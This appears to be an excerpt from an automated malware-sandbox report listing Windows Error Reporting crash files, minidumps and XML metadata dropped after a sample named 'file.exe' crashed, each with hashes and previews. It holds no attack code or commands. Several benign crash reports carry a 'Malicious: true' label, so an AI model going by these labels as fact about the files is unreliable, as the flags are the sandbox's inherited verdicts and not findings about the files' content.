  TargetAppVer=2024 [preview truncated]

Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 65536
Entropy (8bit): 0.8894264832448529
Encrypted: false
SSDEEP: 192:nuV8av+PZJ056rL03jJwwZrHzuiFbZ24IO8ThBj:uVd+Bq56rgjxzuiFbY4IO8L
MD5: 99AB75C4A3FB3448C99860969251658C
SHA1: 7FE99A3E4D97A9D6F85D63B023161A090FEF37C9
SHA-256: B548A90913A73EC23E31935ECEC494F04C1DC75D51DFF5A4D94FA16FE4404188
SHA-512: A0163688EFD19C2D3692A1D1BC3DD8F114923B313E3E8B3F44A54CF2E89ACE2E0CE715EB9583665469CBEEA3B685985DF309358F9CBE7AEAA2E2B54A9EA2EEB4
Malicious: true
Preview (decoded):
  Version=1
  EventType=APPCRASH
  EventTime=133650993021772000
  ReportType=2
  Consent=1
  ReportIdentifier=2045758c-5d66-4c80-a597-8752893b39f1
  IntegratorReportIdentifier=bc2346d4-2811-42e9-a21e-45f22dd74820
  Wow64Host=34404
  Wow64Guest=332
  NsAppName=file.exe
  AppSessionGuid=00000f4c-0001-0015-8e9e-23b8ded2da01
  TargetAppId=W:0006b6cc16416377a9723855ea5468e2b95900006d0f!0000e2b5131d03aa3bc56a004ba6debc6d57322e0691!file.exe
  TargetAppVer=2024//07//10:13:44:46!0!file.exe
  BootId=4294967295
  Service [preview truncated]

Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 65536
Entropy (8bit): 1.021294366924904
Encrypted: false
SSDEEP: 192:yuV8avRPZJ056rL03jJwwZrtKd2zuiFbZ24IO8ThB:jVdRBq56rgjrzuiFbY4IO8L
MD5: 696794BB6E4B072F7550367996D6D9A0
SHA1: DC5C913E850B7AEFFA4871B508BF9F645A265334
SHA-256: 34FE5DE68E8E69BF6668D860C8DBC8E9E963CAC08819E37E6250698756B097DB
SHA-512: F7C5356903AD895FBA312162CB46E982CF2695FFA3231F41D5B4C6906ED293DEBB5376E83C2A129B64B3EBF7A17F497757C858EEF21ECD5909DDD2BB81052BC1
Malicious: true
Preview (decoded):
  Version=1
  EventType=APPCRASH
  EventTime=133650993074073080
  ReportType=2
  Consent=1
  ReportIdentifier=30e4333a-d1e7-48c2-a62d-d257ad7d06d1
  IntegratorReportIdentifier=e7fa6664-fa71-487d-9a84-841dfeb8d978
  Wow64Host=34404
  Wow64Guest=332
  NsAppName=file.exe
  AppSessionGuid=00000f4c-0001-0015-8e9e-23b8ded2da01
  TargetAppId=W:0006b6cc16416377a9723855ea5468e2b95900006d0f!0000e2b5131d03aa3bc56a004ba6debc6d57322e0691!file.exe
  TargetAppVer=2024//07//10:13:44:46!0!file.exe
  BootId=4294967295
  Service [preview truncated]

Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 65536
Entropy (8bit): 1.0057172950135076
Encrypted: false
SSDEEP: 192:wAquV8avBPZJ056rL03jJwwZrtKdUzuiFbZ24IO8ThB:BVdBBq56rgjhzuiFbY4IO8L
MD5: 855734E9072FE4ED0DD13A2FB18ABC67
SHA1: 520931D8999B0DD131D46EA0B0CC8B2CF17434CF
SHA-256: ADF19B47FFFF93D594DABC8D0C2975F702C213D7628BFE6FEC2701B0EFC026A2
SHA-512: 5C164C3990336CF3DCA47271FCC659FFBB27276EB9E41C4D6E72E851D500885E832BF9F74030C820FC0575306B99715BF29709D9D74C1AEBBB8B716087B0061A
Malicious: true
Preview (decoded):
  Version=1
  EventType=APPCRASH
  EventTime=133650993065586039
  ReportType=2
  Consent=1
  ReportIdentifier=39b6735b-7329-4f4a-af31-65b9e8b4b0d8
  IntegratorReportIdentifier=fee4a22b-d22c-40cd-afc2-5dfce9b6c939
  Wow64Host=34404
  Wow64Guest=332
  NsAppName=file.exe
  AppSessionGuid=00000f4c-0001-0015-8e9e-23b8ded2da01
  TargetAppId=W:0006b6cc16416377a9723855ea5468e2b95900006d0f!0000e2b5131d03aa3bc56a004ba6debc6d57322e0691!file.exe
  TargetAppVer=2024//07//10:13:44:46!0!file.exe
  BootId=4294967295
  Service [preview truncated]

Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 65536
Entropy (8bit): 0.9834886758114009
Encrypted: false
SSDEEP: 192:ztuV8av5PZJ056rL03jJwwZrtKdzzuiFbZ24IO8ThB:zoVd5Bq56rgjOzuiFbY4IO8L
MD5: 3DBB32F014D92352F4BD3D263CC8C91D
SHA1: BEBA715C90525B8B20697FC9C932D00B1A8CF155
SHA-256: CA2F4F25298767661C8213C3EFEFBDC409D3A926912E2E08E0F1E9D75710CA19
SHA-512: 631B42CED84351B9A2CC37A2EB559A4FBE05142354F5C26A2DE1DFFF17B6F55E9988900869FAC50FA33EEC713B69918B7CD04DD27D862E23E8501BB5BFF13D54
Malicious: true
Preview (decoded):
  Version=1
  EventType=APPCRASH
  EventTime=133650993054877450
  ReportType=2
  Consent=1
  ReportIdentifier=74aaabdb-7185-4386-86c6-7986510b8f4c
  IntegratorReportIdentifier=8b6f7f02-2a09-4251-9281-f973064177d8
  Wow64Host=34404
  Wow64Guest=332
  NsAppName=file.exe
  AppSessionGuid=00000f4c-0001-0015-8e9e-23b8ded2da01
  TargetAppId=W:0006b6cc16416377a9723855ea5468e2b95900006d0f!0000e2b5131d03aa3bc56a004ba6debc6d57322e0691!file.exe
  TargetAppVer=2024//07//10:13:44:46!0!file.exe
  BootId=4294967295
  Service [preview truncated]

Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 65536
Entropy (8bit): 0.8892987407237314
Encrypted: false
SSDEEP: 192:fuV8avkPZJ056rL03jJwwZrHzuiFbZ24IO8ThB:mVdkBq56rgjxzuiFbY4IO8L
MD5: AEF737DF2637483D8F95E0D87F338829
SHA1: 13F0137B1B6430B092D4C1631574AE0491B46FA1
SHA-256: 3E4B9D8A35649053CE8D4C4B4291D1FDF6EC638B062C8C3D7C658887C128209C
SHA-512: CFEB1D04AAD4B3F677987D32609503839F61701376EEF09DB4F00A3DF9FC06D7669E9BBF5012C67887F5FACB0EA7F62B4226A54CF1AACCDDA2C88541EAC7DB4D
Malicious: true
Preview (decoded):
  Version=1
  EventType=APPCRASH
  EventTime=133650993015423104
  ReportType=2
  Consent=1
  ReportIdentifier=96ff7f74-b663-42e5-bc4f-6f4140ff3be6
  IntegratorReportIdentifier=ebfebfda-c71f-48e7-b187-5f5f6bfaa69f
  Wow64Host=34404
  Wow64Guest=332
  NsAppName=file.exe
  AppSessionGuid=00000f4c-0001-0015-8e9e-23b8ded2da01
  TargetAppId=W:0006b6cc16416377a9723855ea5468e2b95900006d0f!0000e2b5131d03aa3bc56a004ba6debc6d57322e0691!file.exe
  TargetAppVer=2024//07//10:13:44:46!0!file.exe
  BootId=4294967295
  Service [preview truncated]

Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 65536
Entropy (8bit): 0.9830113315369741
Encrypted: false
SSDEEP: 192:4uV8av1PZJ056rL03jJwwZrtKdzzuiFbZ24IO8ThB:tVd1Bq56rgjOzuiFbY4IO8L
                  MD5:892DB0D2433B70FAAEC79AD7C3FB6038
                  SHA1:5374EE8F9BD965C172AD3CE271ABC3710ECAB616
                  SHA-256:B7867DA7893CF3C4D31EA6F3C4F305AD0B5009076977B3B6ABC9F194CB5C466C
                  SHA-512:1D7EA30ABF584A23E000AC2F899A6B7F38C9716D668F5F8B85A3CBA65019D3E948972A07DABA82433DDA736ECEAE1065E4F1630087FC0270B50880F7166AEEE0
                  Malicious:true
                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.5.0.9.9.3.0.4.6.8.7.0.0.8.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.4.5.5.5.4.4.2.-.a.a.9.f.-.4.d.2.b.-.b.8.9.c.-.7.6.1.a.4.7.2.5.d.a.9.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.3.3.a.5.6.8.6.-.8.d.d.9.-.4.0.e.4.-.b.b.b.b.-.5.7.8.f.a.0.b.b.b.2.7.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.f.4.c.-.0.0.0.1.-.0.0.1.5.-.8.e.9.e.-.2.3.b.8.d.e.d.2.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.6.c.c.1.6.4.1.6.3.7.7.a.9.7.2.3.8.5.5.e.a.5.4.6.8.e.2.b.9.5.9.0.0.0.0.6.d.0.f.!.0.0.0.0.e.2.b.5.1.3.1.d.0.3.a.a.3.b.c.5.6.a.0.0.4.b.a.6.d.e.b.c.6.d.5.7.3.2.2.e.0.6.9.1.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.7././.1.0.:.1.3.:.4.4.:.4.6.!.0.!.f.i.l.e...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....S.e.r.v.i.c.e.
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):65536
                  Entropy (8bit):0.8308988040439717
                  Encrypted:false
                  SSDEEP:192:pJuV8avrPZJ056rL03jJZzuiFbZ24IO8ThB:uVdrBq56rgjHzuiFbY4IO8L
                  MD5:2CB9A290E7E2402FDE7B62266FC52EAA
                  SHA1:A0BEFAC1C4199940232F0B842F0FF0617659F7A9
                  SHA-256:B3BD739A232B67C93D0B7CBAC8C3BF5C9C211A80F04A02045B4BA155FC4F0806
                  SHA-512:7FA51D297DD31A89303E274EF935CF9245B1D2DAAD239EC11D374BADB2B0A5036647D548E5F8533E2E237C7250599C18EADC526E04D54943BD476B66AD9BE210
                  Malicious:true
                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.5.0.9.9.3.0.0.0.8.3.0.7.8.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.9.9.4.0.5.c.2.-.2.c.0.a.-.4.6.a.8.-.b.8.4.7.-.4.c.e.f.e.2.3.c.6.5.4.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.b.2.6.6.6.d.1.-.a.e.f.0.-.4.1.4.9.-.a.f.c.5.-.f.2.8.4.a.8.a.f.a.4.d.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.f.4.c.-.0.0.0.1.-.0.0.1.5.-.8.e.9.e.-.2.3.b.8.d.e.d.2.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.6.c.c.1.6.4.1.6.3.7.7.a.9.7.2.3.8.5.5.e.a.5.4.6.8.e.2.b.9.5.9.0.0.0.0.6.d.0.f.!.0.0.0.0.e.2.b.5.1.3.1.d.0.3.a.a.3.b.c.5.6.a.0.0.4.b.a.6.d.e.b.c.6.d.5.7.3.2.2.e.0.6.9.1.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.7././.1.0.:.1.3.:.4.4.:.4.6.!.0.!.f.i.l.e...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....S.e.r.v.i.c.e.
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):65536
                  Entropy (8bit):0.8644095168674399
                  Encrypted:false
                  SSDEEP:192:IuV8avyPZJ056rL03jJwhzuiFbZ24IO8ThB:9VdyBq56rgjgzuiFbY4IO8L
                  MD5:E860B67B6C5C244F4FB3DEC26065BD4C
                  SHA1:6EF9BF0527F779C63ECC86AF8E27A6994470AD0D
                  SHA-256:962538CB9A354525839A66BD9B6202CC529A6EE46779E0FFDD64A6FDBC3612A4
                  SHA-512:C3466BFB0A8006E51FCC300C7659FAEC92ABF20EDC79CEF0CC97DA562442BA7D37300493AC7956ABD5EB4485FD7B8469111AC818E55BC6A0170F74166A9276AC
                  Malicious:true
                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.5.0.9.9.3.0.0.7.3.3.1.6.7.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.5.a.b.6.5.6.6.-.9.a.f.1.-.4.f.9.b.-.8.8.1.4.-.7.4.9.e.c.0.4.e.5.7.d.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.c.9.9.0.f.5.8.-.f.5.f.8.-.4.f.1.2.-.8.2.c.7.-.1.8.0.e.b.4.7.1.7.8.f.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.f.4.c.-.0.0.0.1.-.0.0.1.5.-.8.e.9.e.-.2.3.b.8.d.e.d.2.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.6.c.c.1.6.4.1.6.3.7.7.a.9.7.2.3.8.5.5.e.a.5.4.6.8.e.2.b.9.5.9.0.0.0.0.6.d.0.f.!.0.0.0.0.e.2.b.5.1.3.1.d.0.3.a.a.3.b.c.5.6.a.0.0.4.b.a.6.d.e.b.c.6.d.5.7.3.2.2.e.0.6.9.1.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.7././.1.0.:.1.3.:.4.4.:.4.6.!.0.!.f.i.l.e...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....S.e.r.v.i.c.e.
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):65536
                  Entropy (8bit):0.8957114504865719
                  Encrypted:false
                  SSDEEP:192:iuV8avvPZJ056rL03jJwwZrtdzuiFbZ24IO8ThB:TVdvBq56rgj5zuiFbY4IO8L
                  MD5:368BC7FA201B5128379CF2409A7D2D9D
                  SHA1:442AD2EB9F61AEB6B21BF2C787715A8C5DD3F8D2
                  SHA-256:7370F86413797C8389C25B04C01831BF8A4332C18A4A1F929A4BCFAE5D94A353
                  SHA-512:D3796A025366CB8FF4E68F0B797CDD0787312448FC35B61D57A88B4343368648EED8D82D93E91C83B85DE064F16F5E1DFA151F14ABBACA27CC6FF4EB38525BD9
                  Malicious:true
                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.5.0.9.9.3.0.2.9.0.2.1.8.3.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.d.8.9.d.5.e.8.-.2.6.d.a.-.4.8.0.9.-.8.0.1.d.-.4.e.e.2.9.b.e.b.7.f.8.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.1.d.b.b.1.d.f.-.6.0.f.3.-.4.2.2.4.-.b.b.7.0.-.a.4.0.a.6.6.4.d.1.6.f.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.f.4.c.-.0.0.0.1.-.0.0.1.5.-.8.e.9.e.-.2.3.b.8.d.e.d.2.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.6.c.c.1.6.4.1.6.3.7.7.a.9.7.2.3.8.5.5.e.a.5.4.6.8.e.2.b.9.5.9.0.0.0.0.6.d.0.f.!.0.0.0.0.e.2.b.5.1.3.1.d.0.3.a.a.3.b.c.5.6.a.0.0.4.b.a.6.d.e.b.c.6.d.5.7.3.2.2.e.0.6.9.1.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.7././.1.0.:.1.3.:.4.4.:.4.6.!.0.!.f.i.l.e...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....S.e.r.v.i.c.e.
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):65536
                  Entropy (8bit):0.8961108468150091
                  Encrypted:false
                  SSDEEP:192:YzuV8avcPZJ056rL03jJwwZrtdzuiFbZ24IO8ThB:YSVdcBq56rgj5zuiFbY4IO8L
                  MD5:F6646153C106BBD42FA439CD9EB30E3E
                  SHA1:E99F792A7E7C2F3B2F381D5B5EBEEBEE557FC085
                  SHA-256:30A3835053483BC04B8E289E08CF20B1B0AB63722CC2D0FFA3EA31FB5E221899
                  SHA-512:FB524EB0851BC6A31AFD1D851C163AA92EE384714BB120F2BB50420D48EC819C1F3AF5376AD82D0CD41EA5922D936FE90491F4FD6EEA6FD5386A0D2E1F621A00
                  Malicious:true
                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.5.0.9.9.3.0.3.7.0.4.8.0.5.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.d.7.8.c.c.2.8.-.4.d.3.c.-.4.4.b.a.-.8.8.7.5.-.3.d.5.5.6.9.f.0.2.f.f.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.b.7.5.6.2.e.5.-.1.d.4.1.-.4.b.7.7.-.9.5.a.8.-.1.8.d.a.9.d.9.5.d.d.2.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.f.4.c.-.0.0.0.1.-.0.0.1.5.-.8.e.9.e.-.2.3.b.8.d.e.d.2.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.6.c.c.1.6.4.1.6.3.7.7.a.9.7.2.3.8.5.5.e.a.5.4.6.8.e.2.b.9.5.9.0.0.0.0.6.d.0.f.!.0.0.0.0.e.2.b.5.1.3.1.d.0.3.a.a.3.b.c.5.6.a.0.0.4.b.a.6.d.e.b.c.6.d.5.7.3.2.2.e.0.6.9.1.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.7././.1.0.:.1.3.:.4.4.:.4.6.!.0.!.f.i.l.e...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....S.e.r.v.i.c.e.
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):65536
                  Entropy (8bit):1.1016310975983161
                  Encrypted:false
                  SSDEEP:192:QSuV8avvPZT0rKq503jJwwZrtKdFmzuiFbZ24IO8ThB:kVdvBArKqujomzuiFbY4IO8L
                  MD5:517461F2489B5650A5D43003AF46B48C
                  SHA1:83A7E8B02D24CBD793820A71CA6B2A9EF87A4015
                  SHA-256:D88A364B1D8C1E35BC45FC71E9C93E1A3D2F880DC950F455526EB0410D4F059C
                  SHA-512:99ABA809B73A219A1A667906B093B5B3C1B438C02A3EB890278F253E2A97C55A942F9B8A54675C1278342A9654E7E722ABF7D58B2330808D1D94C958333ABEDB
                  Malicious:true
                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.5.0.9.9.3.0.8.9.8.9.7.8.1.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.5.0.9.9.3.0.9.7.0.8.5.3.5.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.f.6.c.b.f.f.3.-.9.0.e.2.-.4.7.0.2.-.a.b.6.d.-.8.d.6.4.0.7.a.8.a.c.c.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.6.e.e.4.0.8.9.-.f.0.c.9.-.4.5.a.a.-.8.8.d.4.-.6.c.6.3.4.3.b.3.0.5.4.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.f.4.c.-.0.0.0.1.-.0.0.1.5.-.8.e.9.e.-.2.3.b.8.d.e.d.2.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.6.c.c.1.6.4.1.6.3.7.7.a.9.7.2.3.8.5.5.e.a.5.4.6.8.e.2.b.9.5.9.0.0.0.0.6.d.0.f.!.0.0.0.0.e.2.b.5.1.3.1.d.0.3.a.a.3.b.c.5.6.a.0.0.4.b.a.6.d.e.b.c.6.d.5.7.3.2.2.e.0.6.9.1.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.7.
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Mini DuMP crash report, 14 streams, Wed Jul 10 15:36:02 2024, 0x1205a4 type
                  Category:dropped
                  Size (bytes):59136
                  Entropy (8bit):1.9086051912701356
                  Encrypted:false
                  SSDEEP:192:mmMINbXWSZhiOrF5MOWY95+F+RCn6UuBZkOITSG9gwiX7knMjH:9MzSZrrzz5K+Yn6vBCOWgws7z
                  MD5:868CA210F8E704DF74512A1A8C956F2F
                  SHA1:70D719E23E493CDABFB33968911F637920755675
                  SHA-256:D4328450B46F43315509CC3A9329D3D9D67B200F8FC00E45209E9BCA4490482B
                  SHA-512:9CDE2F5D57122E3B9DAAC49C81C832F4E34CE9139B61F20FBD7ECA2C914AE9B519037D097748930355BF6F4E47E756E58C0FFE45B0FCC59CF9C2D81179C47493
                  Malicious:false
                  Preview:MDMP..a..... .......b..f............$...............,...........,,..........T.......8...........T...........x...............(...........................................................................................eJ..............GenuineIntel............T...........`..f.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):6328
                  Entropy (8bit):3.722917700266873
                  Encrypted:false
                  SSDEEP:192:R6l7wVeJRO6IHyOpyYXrpBP89bzMsfOxm:R6lXJ46IHyNYXkzffp
                  MD5:2C61EAD73EECE95089BD834F76A26045
                  SHA1:877FE9E171BAAD38759B9033960D467771EFAAFC
                  SHA-256:049E0C702CA428710108D28710454CEE9492FF437375B62BCBD96F62BE141B18
                  SHA-512:F7793BF296171D1D15B94DAF448E71D539A9F602177A270D50D193F53BD94F2CEE5D91EA758C7CE53CD5E465A7C694B507A8BC3453D40DB302BA6FDC360B98C1
                  Malicious:false
                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.9.1.2.<./.P.i.
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):4599
                  Entropy (8bit):4.4730411718002445
                  Encrypted:false
                  SSDEEP:48:cvIwWl8zsMJg77aI9ZCjWpW8VYSYm8M4J00FN+q8Z/1CBHIcd:uIjfKI7+S7V2Jde1CVIcd
                  MD5:D8EC0B8B476265F29C36A4CB00C94AD0
                  SHA1:18E0F5108868EC3FD3429BBD8F133C50887EE790
                  SHA-256:7AA0D4F672D01EF30D4D7147493F11954CBEBA51F620467D95A47FADA2F73816
                  SHA-512:D17EA560D784D1D6BB8DA43CF2271DFDABD2282CC52BC37EB75C24FF2C9C805263184394E6C0025422C9955783534546BE33C708C1B1F85FAAF2EA046946B62A
                  Malicious:false
                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="405038" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Mini DuMP crash report, 14 streams, Wed Jul 10 15:36:02 2024, 0x1205a4 type
                  Category:dropped
                  Size (bytes):61824
                  Entropy (8bit):1.9844107707796004
                  Encrypted:false
                  SSDEEP:192:mTqNbXWSZ0tOr0hU5/w6W19BLu6MQGRCn6UuBZkOITSq94zXz7hy:8dSZfr0g/Qa7Yn6vBCOK4jz9
                  MD5:474BF31930E8414BAA765A4CF493B9A2
                  SHA1:5E6799EE8895F0CA115C78E5211102A349A2629F
                  SHA-256:DADEB8D7C4DBF27D6F3B1D06B93A05A05070D05C1899C681B65A0C78C297E278
                  SHA-512:31EEEC37A29906400D6E6D555E60546F9E09A0C7B725A5D52D80EEB8FEDC646A42A9EEF10BCE7D223E871053D525277012B6E6BF6D51BDA1FB1F086E70E7EBD6
                  Malicious:false
